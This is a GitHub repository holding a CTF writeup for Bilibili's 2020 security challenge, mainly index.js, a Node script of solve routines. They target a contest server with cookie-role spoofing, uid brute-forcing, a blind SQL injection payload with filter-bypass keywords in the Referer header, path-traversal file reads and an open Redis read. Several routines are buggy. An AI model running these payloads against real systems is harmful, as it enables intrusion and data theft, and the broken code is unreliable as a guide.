├── .gitignore ├── LICENSE ├── README.md ├── index.js ├── package-lock.json └── package.json /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 埋桑 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bilibili-sec2020-writeup 2 | 哔哩哔哩2020年度安全挑战赛 - Writeup 3 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | const request = require("request"); 2 | const redis = require("redis"); 3 | 4 | let session = ""; // 此处填写个人 session 5 | 6 | // 第一题 - 查源码 + 查请求 7 | const func1 = function () { 8 | const config = { 9 | url: "http://45.113.201.36/api/admin", 10 | headers: { 11 | "User-Agent": "bilibili Security Browser", 12 | Cookie: `session=${session}`, 13 | }, 14 | callback(error, response, body) { 15 | if (!error && response.statusCode == 200) { 16 | console.log("flag1:", body.data); 17 | } 18 | }, 19 | request() { 20 | request( 21 | { 22 | url: this.url, 23 | headers: this.headers, 24 | json: true, 25 | }, 26 | callback 27 | ); 28 | }, 29 | }; 30 | 31 | config.request(); 32 | }; 33 | 34 | // 第二题 - 修改UA 35 | const func2 = function () { 36 | const config = { 37 | url: "http://45.113.201.36/api/ctf/2", 38 | headers: { 39 | "User-Agent": "bilibili Security Browser", 40 | Cookie: `session=${session}`, 41 | }, 42 | callback(error, response, body) { 43 | if (!error && response.statusCode == 200) { 44 | console.log("flag2:", body.data); 45 | } 46 | }, 47 | request() { 48 | request( 49 | { 50 | url: this.url, 51 | headers: this.headers, 52 | json: true, 53 | }, 54 | callback 55 | ); 56 | }, 57 | }; 58 | 59 | config.request(); 60 | }; 61 | 62 | // 第三题 63 | const func3 = function () { 64 | const config = { 65 | url: "http://45.113.201.36/api/ctf/3", 66 | role: "ee11cbb19052e40b07aac0ca060c23ee", 67 | headers: { 68 | "User-Agent": "bilibili Security Browser", 69 | Cookie: `role=${this.role}; session=${session};`, 70 | }, 71 | callback(error, response, body) { 72 | if (!error && response.statusCode == 200) { 73 | console.log("flag3:", body.data); 74 | } 75 | }, 76 | request() { 77 | request.post( 78 | { 79 | url: this.url, 80 | headers: this.headers, 81 | json: true, 82 | }, 83 | callback 84 | ); 85 | }, 86 | }; 87 | 88 | config.request(); 89 | }; 90 | 91 | // 第四题 - 修改Cookie - role 92 | const func4 = function () { 93 | const config = { 94 | url: "http://45.113.201.36/api/ctf/4", 95 | role: "7b7bc2512ee1fedcd76bdc68926d4f7b", // 即 'Administrator' 的 MD5 字符串, 需要修改。 96 | headers: { 97 | "User-Agent": "bilibili Security Browser", 98 | Cookie: `role=${this.role}; session=${session};`, 99 | }, 100 | callback(error, response, body) { 101 | if (!error && response.statusCode == 200) { 102 | console.log("flag4:", body.data); 103 | } 104 | }, 105 | request() { 106 | request.post( 107 | { 108 | url: this.url, 109 | headers: this.headers, 110 | json: true, 111 | }, 112 | callback 113 | ); 114 | }, 115 | }; 116 | 117 | config.request(); 118 | }; 119 | 120 | // 第五题 - 暴力破解 121 | const func5 = function () { 122 | const config = { 123 | uid: 100336889, 124 | get url() { 125 | return `http://45.113.201.36/api/ctf/5?uid=${uid}`; 126 | }, 127 | role: "ee11cbb19052e40b07aac0ca060c23ee", 128 | headers: { 129 | "User-Agent": "bilibili Security Browser", 130 | Cookie: `role=${this.role}; session=${session};`, 131 | }, 132 | callback(error, response, body) { 133 | if (!error && response.statusCode == 200) { 134 | if (body.flag === undefined) { 135 | uid++; 136 | request.post( 137 | { 138 | url, 139 | headers, 140 | json: true, 141 | }, 142 | this.callback 143 | ); 144 | } else { 145 | console.log("flag5:", body.data); 146 | return; 147 | } 148 | } 149 | }, 150 | request() { 151 | request( 152 | { 153 | url: this.url, 154 | headers: this.headers, 155 | json: true, 156 | }, 157 | callback 158 | ); 159 | }, 160 | }; 161 | 162 | config.request(); 163 | }; 164 | 165 | // 第六题 - SQL注入 166 | const func6 = function () { 167 | const config = { 168 | url: "http://45.113.201.36/blog/single.php?id=1", 169 | flag: "", 170 | role: "ee11cbb19052e40b07aac0ca060c23ee", 171 | headers: { 172 | "User-Agent": "bilibili Security Browser", 173 | Cookie: `role=${this.role}; session=${session};`, 174 | }, 175 | callback(error, response, body) { 176 | if (!error && response.statusCode == 200) { 177 | console.log("flag4:", body.data); 178 | } 179 | }, 180 | request() { 181 | for (let i = 1; i <= 100; i++) { 182 | let left = 33; 183 | let right = 128; 184 | 185 | while (right - left != 1) { 186 | let mid = Math.floor((left + right) / 2); 187 | let payload = `0123'^if(substr((selselectect flag from flag),${i},1)>binary ${mid.toString( 188 | 16 189 | )},(selecselectt 1+~0),0) ununionion selecselectt 1,2#`; 190 | let headers = { 191 | Cookie: `role=${this.role}; session=${session};`, 192 | Referer: payload, 193 | }; 194 | let callback = function (error, response, body) { 195 | if (!error && response.statusCode == 200) { 196 | if (body.data.length == 5596) { 197 | left = mid; 198 | } else { 199 | right = mid; 200 | } 201 | } 202 | }; 203 | request( 204 | { 205 | url, 206 | headers, 207 | json: true, 208 | }, 209 | callback 210 | ); 211 | } 212 | flag = String.charCodeAt(right); 213 | } 214 | console.log("flag6:", flag); 215 | }, 216 | }; 217 | 218 | config.request(); 219 | }; 220 | 221 | // 第七题 - 任意文件读取 222 | const func7 = function () { 223 | const config = { 224 | url: "http://45.113.201.36/api/images?file=../../../flag7.txt", 225 | role: "7b7bc2512ee1fedcd76bdc68926d4f7b", 226 | headers: { 227 | "User-Agent": "bilibili Security Browser", 228 | Cookie: `role=${this.role}; session=${session};`, 229 | }, 230 | callback(error, response, body) { 231 | if (!error && response.statusCode == 200) { 232 | // 文件读取 233 | } 234 | }, 235 | request() { 236 | request( 237 | { 238 | url, 239 | headers, 240 | json: true, 241 | }, 242 | callback 243 | ); 244 | }, 245 | }; 246 | 247 | config.request(); 248 | }; 249 | 250 | // 第八题 - 查Redis 251 | const func8 = function () { 252 | const config = { 253 | get client() { 254 | return redis.createClient(6379, "45.113.201.36"); 255 | }, 256 | callback() { 257 | this.client.get("flag8", function (err, reply) { 258 | if (!err) { 259 | console.log(reply.toString()); 260 | } 261 | }); 262 | }, 263 | connect() { 264 | this.client.on("connect", callback); 265 | }, 266 | }; 267 | 268 | config.connect(); 269 | }; 270 | 271 | // 第九题 - 任意文件读取 + 密钥解密 272 | const func9 = function () { 273 | const config = { 274 | url: "http://45.113.201.36/api/images?file=../../../secret.txt", 275 | role: "ee11cbb19052e40b07aac0ca060c23ee", 276 | headers: { 277 | "User-Agent": "bilibili Security Browser", 278 | Cookie: `role=${this.role}; session=${this.session};`, 279 | }, 280 | callback(error, response, body) { 281 | if (!error && response.statusCode == 200) { 282 | // 得到加密字符串,该字符串解密后即为 flag 283 | } 284 | }, 285 | request() { 286 | request.post( 287 | { 288 | url: this.url, 289 | headers: this.headers, 290 | json: true, 291 | }, 292 | this.callback 293 | ); 294 | }, 295 | }; 296 | 297 | config.request(); 298 | }; 299 | 300 | // 第十题 - Meta Type 301 | const func10 = function () { 302 | const config = { 303 | url: "http://45.113.201.36/blog/end.php?id[]=&url=flag.txt", // dirsearch 后,得知存在 /blog/test.php,返回内容为 jsfuck 编码的 JS 代码,转义后为var str1 = "程序员最多的地方"; var str2 = "bilibili1024havefun"; console.log()。Github 上找到对应仓库后根据提示得到该URL。 304 | role: "ee11cbb19052e40b07aac0ca060c23ee", 305 | headers: { 306 | "User-Agent": "bilibili Security Browser", 307 | Cookie: `role=${this.role}; session=${session};`, 308 | }, 309 | callback(error, response, body) { 310 | if (!error && response.statusCode == 200) { 311 | // 得到加密字符串,该字符串解密后即为 flag 312 | } 313 | }, 314 | request() { 315 | request.post( 316 | { 317 | url: this.url, 318 | headers: this.headers, 319 | json: true, 320 | }, 321 | this.callback 322 | ); 323 | }, 324 | }; 325 | 326 | config.request(); 327 | }; 328 | 329 | func1(); 330 | func2(); 331 | func3(); 332 | func4(); 333 | func5(); 334 | func6(); 335 | func7(); 336 | func8(); 337 | func9(); 338 | func10(); 339 | -------------------------------------------------------------------------------- /package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "lockfileVersion": 1, 5 | "requires": true, 6 | "dependencies": { 7 | "ajv": { 8 | "version": "6.12.6", 9 | "resolved": "https://registry.npm.taobao.org/ajv/download/ajv-6.12.6.tgz?cache=0&sync_timestamp=1603561543180&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fajv%2Fdownload%2Fajv-6.12.6.tgz", 10 | "integrity": "sha1-uvWmLoArB9l3A0WG+MO69a3ybfQ=", 11 | "requires": { 12 | "fast-deep-equal": "^3.1.1", 13 | "fast-json-stable-stringify": "^2.0.0", 14 | "json-schema-traverse": "^0.4.1", 15 | "uri-js": "^4.2.2" 16 | } 17 | }, 18 | "asn1": { 19 | "version": "0.2.4", 20 | "resolved": "https://registry.npm.taobao.org/asn1/download/asn1-0.2.4.tgz", 21 | "integrity": "sha1-jSR136tVO7M+d7VOWeiAu4ziMTY=", 22 | "requires": { 23 | "safer-buffer": "~2.1.0" 24 | } 25 | }, 26 | "assert-plus": { 27 | "version": "1.0.0", 28 | "resolved": "https://registry.npm.taobao.org/assert-plus/download/assert-plus-1.0.0.tgz", 29 | "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" 30 | }, 31 | "asynckit": { 32 | "version": "0.4.0", 33 | "resolved": "https://registry.npm.taobao.org/asynckit/download/asynckit-0.4.0.tgz", 34 | "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" 35 | }, 36 | "aws-sign2": { 37 | "version": "0.7.0", 38 | "resolved": "https://registry.npm.taobao.org/aws-sign2/download/aws-sign2-0.7.0.tgz", 39 | "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" 40 | }, 41 | "aws4": { 42 | "version": "1.10.1", 43 | "resolved": "https://registry.npm.taobao.org/aws4/download/aws4-1.10.1.tgz?cache=0&sync_timestamp=1597236947743&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Faws4%2Fdownload%2Faws4-1.10.1.tgz", 44 | "integrity": "sha1-4eguTz6Zniz9YbFhKA0WoRH4ZCg=" 45 | }, 46 | "bcrypt-pbkdf": { 47 | "version": "1.0.2", 48 | "resolved": "https://registry.npm.taobao.org/bcrypt-pbkdf/download/bcrypt-pbkdf-1.0.2.tgz", 49 | "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", 50 | "requires": { 51 | "tweetnacl": "^0.14.3" 52 | } 53 | }, 54 | "caseless": { 55 | "version": "0.12.0", 56 | "resolved": "https://registry.npm.taobao.org/caseless/download/caseless-0.12.0.tgz", 57 | "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" 58 | }, 59 | "combined-stream": { 60 | "version": "1.0.8", 61 | "resolved": "https://registry.npm.taobao.org/combined-stream/download/combined-stream-1.0.8.tgz", 62 | "integrity": "sha1-w9RaizT9cwYxoRCoolIGgrMdWn8=", 63 | "requires": { 64 | "delayed-stream": "~1.0.0" 65 | } 66 | }, 67 | "core-util-is": { 68 | "version": "1.0.2", 69 | "resolved": "https://registry.npm.taobao.org/core-util-is/download/core-util-is-1.0.2.tgz", 70 | "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" 71 | }, 72 | "dashdash": { 73 | "version": "1.14.1", 74 | "resolved": "https://registry.npm.taobao.org/dashdash/download/dashdash-1.14.1.tgz?cache=0&sync_timestamp=1601073714105&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fdashdash%2Fdownload%2Fdashdash-1.14.1.tgz", 75 | "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", 76 | "requires": { 77 | "assert-plus": "^1.0.0" 78 | } 79 | }, 80 | "delayed-stream": { 81 | "version": "1.0.0", 82 | "resolved": "https://registry.npm.taobao.org/delayed-stream/download/delayed-stream-1.0.0.tgz", 83 | "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" 84 | }, 85 | "denque": { 86 | "version": "1.4.1", 87 | "resolved": "https://registry.npm.taobao.org/denque/download/denque-1.4.1.tgz", 88 | "integrity": "sha1-Z0T/dkHBSMP4ppwwflEjXB9KN88=" 89 | }, 90 | "ecc-jsbn": { 91 | "version": "0.1.2", 92 | "resolved": "https://registry.npm.taobao.org/ecc-jsbn/download/ecc-jsbn-0.1.2.tgz", 93 | "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", 94 | "requires": { 95 | "jsbn": "~0.1.0", 96 | "safer-buffer": "^2.1.0" 97 | } 98 | }, 99 | "extend": { 100 | "version": "3.0.2", 101 | "resolved": "https://registry.npm.taobao.org/extend/download/extend-3.0.2.tgz", 102 | "integrity": "sha1-+LETa0Bx+9jrFAr/hYsQGewpFfo=" 103 | }, 104 | "extsprintf": { 105 | "version": "1.3.0", 106 | "resolved": "https://registry.npm.taobao.org/extsprintf/download/extsprintf-1.3.0.tgz", 107 | "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" 108 | }, 109 | "fast-deep-equal": { 110 | "version": "3.1.3", 111 | "resolved": "https://registry.npm.taobao.org/fast-deep-equal/download/fast-deep-equal-3.1.3.tgz?cache=0&sync_timestamp=1591599604977&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Ffast-deep-equal%2Fdownload%2Ffast-deep-equal-3.1.3.tgz", 112 | "integrity": "sha1-On1WtVnWy8PrUSMlJE5hmmXGxSU=" 113 | }, 114 | "fast-json-stable-stringify": { 115 | "version": "2.1.0", 116 | "resolved": "https://registry.npm.taobao.org/fast-json-stable-stringify/download/fast-json-stable-stringify-2.1.0.tgz", 117 | "integrity": "sha1-h0v2nG9ATCtdmcSBNBOZ/VWJJjM=" 118 | }, 119 | "forever-agent": { 120 | "version": "0.6.1", 121 | "resolved": "https://registry.npm.taobao.org/forever-agent/download/forever-agent-0.6.1.tgz", 122 | "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" 123 | }, 124 | "form-data": { 125 | "version": "2.3.3", 126 | "resolved": "https://registry.npm.taobao.org/form-data/download/form-data-2.3.3.tgz?cache=0&sync_timestamp=1589721949882&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fform-data%2Fdownload%2Fform-data-2.3.3.tgz", 127 | "integrity": "sha1-3M5SwF9kTymManq5Nr1yTO/786Y=", 128 | "requires": { 129 | "asynckit": "^0.4.0", 130 | "combined-stream": "^1.0.6", 131 | "mime-types": "^2.1.12" 132 | } 133 | }, 134 | "getpass": { 135 | "version": "0.1.7", 136 | "resolved": "https://registry.npm.taobao.org/getpass/download/getpass-0.1.7.tgz", 137 | "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", 138 | "requires": { 139 | "assert-plus": "^1.0.0" 140 | } 141 | }, 142 | "har-schema": { 143 | "version": "2.0.0", 144 | "resolved": "https://registry.npm.taobao.org/har-schema/download/har-schema-2.0.0.tgz", 145 | "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" 146 | }, 147 | "har-validator": { 148 | "version": "5.1.5", 149 | "resolved": "https://registry.npm.taobao.org/har-validator/download/har-validator-5.1.5.tgz?cache=0&sync_timestamp=1596082584903&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fhar-validator%2Fdownload%2Fhar-validator-5.1.5.tgz", 150 | "integrity": "sha1-HwgDufjLIMD6E4It8ezds2veHv0=", 151 | "requires": { 152 | "ajv": "^6.12.3", 153 | "har-schema": "^2.0.0" 154 | } 155 | }, 156 | "http-signature": { 157 | "version": "1.2.0", 158 | "resolved": "https://registry.npm.taobao.org/http-signature/download/http-signature-1.2.0.tgz?cache=0&sync_timestamp=1600868555829&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fhttp-signature%2Fdownload%2Fhttp-signature-1.2.0.tgz", 159 | "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", 160 | "requires": { 161 | "assert-plus": "^1.0.0", 162 | "jsprim": "^1.2.2", 163 | "sshpk": "^1.7.0" 164 | } 165 | }, 166 | "is-typedarray": { 167 | "version": "1.0.0", 168 | "resolved": "https://registry.npm.taobao.org/is-typedarray/download/is-typedarray-1.0.0.tgz", 169 | "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" 170 | }, 171 | "isstream": { 172 | "version": "0.1.2", 173 | "resolved": "https://registry.npm.taobao.org/isstream/download/isstream-0.1.2.tgz", 174 | "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" 175 | }, 176 | "jsbn": { 177 | "version": "0.1.1", 178 | "resolved": "https://registry.npm.taobao.org/jsbn/download/jsbn-0.1.1.tgz", 179 | "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" 180 | }, 181 | "json-schema": { 182 | "version": "0.2.3", 183 | "resolved": "https://registry.npm.taobao.org/json-schema/download/json-schema-0.2.3.tgz", 184 | "integrity": "sha1-tIDIkuWaLwWVTOcnvT8qTogvnhM=" 185 | }, 186 | "json-schema-traverse": { 187 | "version": "0.4.1", 188 | "resolved": "https://registry.npm.taobao.org/json-schema-traverse/download/json-schema-traverse-0.4.1.tgz?cache=0&sync_timestamp=1599333925809&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fjson-schema-traverse%2Fdownload%2Fjson-schema-traverse-0.4.1.tgz", 189 | "integrity": "sha1-afaofZUTq4u4/mO9sJecRI5oRmA=" 190 | }, 191 | "json-stringify-safe": { 192 | "version": "5.0.1", 193 | "resolved": "https://registry.npm.taobao.org/json-stringify-safe/download/json-stringify-safe-5.0.1.tgz", 194 | "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" 195 | }, 196 | "jsprim": { 197 | "version": "1.4.1", 198 | "resolved": "https://registry.npm.taobao.org/jsprim/download/jsprim-1.4.1.tgz", 199 | "integrity": "sha1-MT5mvB5cwG5Di8G3SZwuXFastqI=", 200 | "requires": { 201 | "assert-plus": "1.0.0", 202 | "extsprintf": "1.3.0", 203 | "json-schema": "0.2.3", 204 | "verror": "1.10.0" 205 | } 206 | }, 207 | "mime-db": { 208 | "version": "1.44.0", 209 | "resolved": "https://registry.npm.taobao.org/mime-db/download/mime-db-1.44.0.tgz?cache=0&sync_timestamp=1600831159918&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fmime-db%2Fdownload%2Fmime-db-1.44.0.tgz", 210 | "integrity": "sha1-+hHF6wrKEzS0Izy01S8QxaYnL5I=" 211 | }, 212 | "mime-types": { 213 | "version": "2.1.27", 214 | "resolved": "https://registry.npm.taobao.org/mime-types/download/mime-types-2.1.27.tgz", 215 | "integrity": "sha1-R5SfmOJ56lMRn1ci4PNOUpvsAJ8=", 216 | "requires": { 217 | "mime-db": "1.44.0" 218 | } 219 | }, 220 | "oauth-sign": { 221 | "version": "0.9.0", 222 | "resolved": "https://registry.npm.taobao.org/oauth-sign/download/oauth-sign-0.9.0.tgz", 223 | "integrity": "sha1-R6ewFrqmi1+g7PPe4IqFxnmsZFU=" 224 | }, 225 | "performance-now": { 226 | "version": "2.1.0", 227 | "resolved": "https://registry.npm.taobao.org/performance-now/download/performance-now-2.1.0.tgz", 228 | "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" 229 | }, 230 | "psl": { 231 | "version": "1.8.0", 232 | "resolved": "https://registry.npm.taobao.org/psl/download/psl-1.8.0.tgz", 233 | "integrity": "sha1-kyb4vPsBOtzABf3/BWrM4CDlHCQ=" 234 | }, 235 | "punycode": { 236 | "version": "2.1.1", 237 | "resolved": "https://registry.npm.taobao.org/punycode/download/punycode-2.1.1.tgz", 238 | "integrity": "sha1-tYsBCsQMIsVldhbI0sLALHv0eew=" 239 | }, 240 | "qs": { 241 | "version": "6.5.2", 242 | "resolved": "https://registry.npm.taobao.org/qs/download/qs-6.5.2.tgz", 243 | "integrity": "sha1-yzroBuh0BERYTvFUzo7pjUA/PjY=" 244 | }, 245 | "redis": { 246 | "version": "3.0.2", 247 | "resolved": "https://registry.npm.taobao.org/redis/download/redis-3.0.2.tgz", 248 | "integrity": "sha1-vUcGe4pKPmouVW5X9xzILHNgFQo=", 249 | "requires": { 250 | "denque": "^1.4.1", 251 | "redis-commands": "^1.5.0", 252 | "redis-errors": "^1.2.0", 253 | "redis-parser": "^3.0.0" 254 | } 255 | }, 256 | "redis-commands": { 257 | "version": "1.6.0", 258 | "resolved": "https://registry.npm.taobao.org/redis-commands/download/redis-commands-1.6.0.tgz", 259 | "integrity": "sha1-NtTKQq6e0pgVzbMK2fl5guuhziM=" 260 | }, 261 | "redis-errors": { 262 | "version": "1.2.0", 263 | "resolved": "https://registry.npm.taobao.org/redis-errors/download/redis-errors-1.2.0.tgz", 264 | "integrity": "sha1-62LSrbFeTq9GEMBK/hUpOEJQq60=" 265 | }, 266 | "redis-parser": { 267 | "version": "3.0.0", 268 | "resolved": "https://registry.npm.taobao.org/redis-parser/download/redis-parser-3.0.0.tgz", 269 | "integrity": "sha1-tm2CjNyv5rS4pCin3vTGvKwxyLQ=", 270 | "requires": { 271 | "redis-errors": "^1.0.0" 272 | } 273 | }, 274 | "request": { 275 | "version": "2.88.2", 276 | "resolved": "https://registry.npm.taobao.org/request/download/request-2.88.2.tgz", 277 | "integrity": "sha1-1zyRhzHLWofaBH4gcjQUb2ZNErM=", 278 | "requires": { 279 | "aws-sign2": "~0.7.0", 280 | "aws4": "^1.8.0", 281 | "caseless": "~0.12.0", 282 | "combined-stream": "~1.0.6", 283 | "extend": "~3.0.2", 284 | "forever-agent": "~0.6.1", 285 | "form-data": "~2.3.2", 286 | "har-validator": "~5.1.3", 287 | "http-signature": "~1.2.0", 288 | "is-typedarray": "~1.0.0", 289 | "isstream": "~0.1.2", 290 | "json-stringify-safe": "~5.0.1", 291 | "mime-types": "~2.1.19", 292 | "oauth-sign": "~0.9.0", 293 | "performance-now": "^2.1.0", 294 | "qs": "~6.5.2", 295 | "safe-buffer": "^5.1.2", 296 | "tough-cookie": "~2.5.0", 297 | "tunnel-agent": "^0.6.0", 298 | "uuid": "^3.3.2" 299 | } 300 | }, 301 | "safe-buffer": { 302 | "version": "5.2.1", 303 | "resolved": "https://registry.npm.taobao.org/safe-buffer/download/safe-buffer-5.2.1.tgz", 304 | "integrity": "sha1-Hq+fqb2x/dTsdfWPnNtOa3gn7sY=" 305 | }, 306 | "safer-buffer": { 307 | "version": "2.1.2", 308 | "resolved": "https://registry.npm.taobao.org/safer-buffer/download/safer-buffer-2.1.2.tgz", 309 | "integrity": "sha1-RPoWGwGHuVSd2Eu5GAL5vYOFzWo=" 310 | }, 311 | "sshpk": { 312 | "version": "1.16.1", 313 | "resolved": "https://registry.npm.taobao.org/sshpk/download/sshpk-1.16.1.tgz", 314 | "integrity": "sha1-+2YcC+8ps520B2nuOfpwCT1vaHc=", 315 | "requires": { 316 | "asn1": "~0.2.3", 317 | "assert-plus": "^1.0.0", 318 | "bcrypt-pbkdf": "^1.0.0", 319 | "dashdash": "^1.12.0", 320 | "ecc-jsbn": "~0.1.1", 321 | "getpass": "^0.1.1", 322 | "jsbn": "~0.1.0", 323 | "safer-buffer": "^2.0.2", 324 | "tweetnacl": "~0.14.0" 325 | } 326 | }, 327 | "tough-cookie": { 328 | "version": "2.5.0", 329 | "resolved": "https://registry.npm.taobao.org/tough-cookie/download/tough-cookie-2.5.0.tgz", 330 | "integrity": "sha1-zZ+yoKodWhK0c72fuW+j3P9lreI=", 331 | "requires": { 332 | "psl": "^1.1.28", 333 | "punycode": "^2.1.1" 334 | } 335 | }, 336 | "tunnel-agent": { 337 | "version": "0.6.0", 338 | "resolved": "https://registry.npm.taobao.org/tunnel-agent/download/tunnel-agent-0.6.0.tgz", 339 | "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", 340 | "requires": { 341 | "safe-buffer": "^5.0.1" 342 | } 343 | }, 344 | "tweetnacl": { 345 | "version": "0.14.5", 346 | "resolved": "https://registry.npm.taobao.org/tweetnacl/download/tweetnacl-0.14.5.tgz", 347 | "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" 348 | }, 349 | "uri-js": { 350 | "version": "4.4.0", 351 | "resolved": "https://registry.npm.taobao.org/uri-js/download/uri-js-4.4.0.tgz", 352 | "integrity": "sha1-qnFCYd55PoqCNHp7zJznTobyhgI=", 353 | "requires": { 354 | "punycode": "^2.1.0" 355 | } 356 | }, 357 | "uuid": { 358 | "version": "3.4.0", 359 | "resolved": "https://registry.npm.taobao.org/uuid/download/uuid-3.4.0.tgz?cache=0&sync_timestamp=1601826526166&other_urls=https%3A%2F%2Fregistry.npm.taobao.org%2Fuuid%2Fdownload%2Fuuid-3.4.0.tgz", 360 | "integrity": "sha1-sj5DWK+oogL+ehAK8fX4g/AgB+4=" 361 | }, 362 | "verror": { 363 | "version": "1.10.0", 364 | "resolved": "https://registry.npm.taobao.org/verror/download/verror-1.10.0.tgz", 365 | "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", 366 | "requires": { 367 | "assert-plus": "^1.0.0", 368 | "core-util-is": "1.0.2", 369 | "extsprintf": "^1.2.0" 370 | } 371 | } 372 | } 373 | } 374 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "description": "哔哩哔哩2020年度安全挑战赛 - Writeup", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [ 10 | "bilibili", 11 | "writeup", 12 | "web", 13 | "ctf", 14 | "sec" 15 | ], 16 | "author": "CNMathon ", 17 | "license": "MIT", 18 | "dependencies": { 19 | "redis": "^3.0.2", 20 | "request": "^2.88.2" 21 | } 22 | } 23 | --------------------------------------------------------------------------------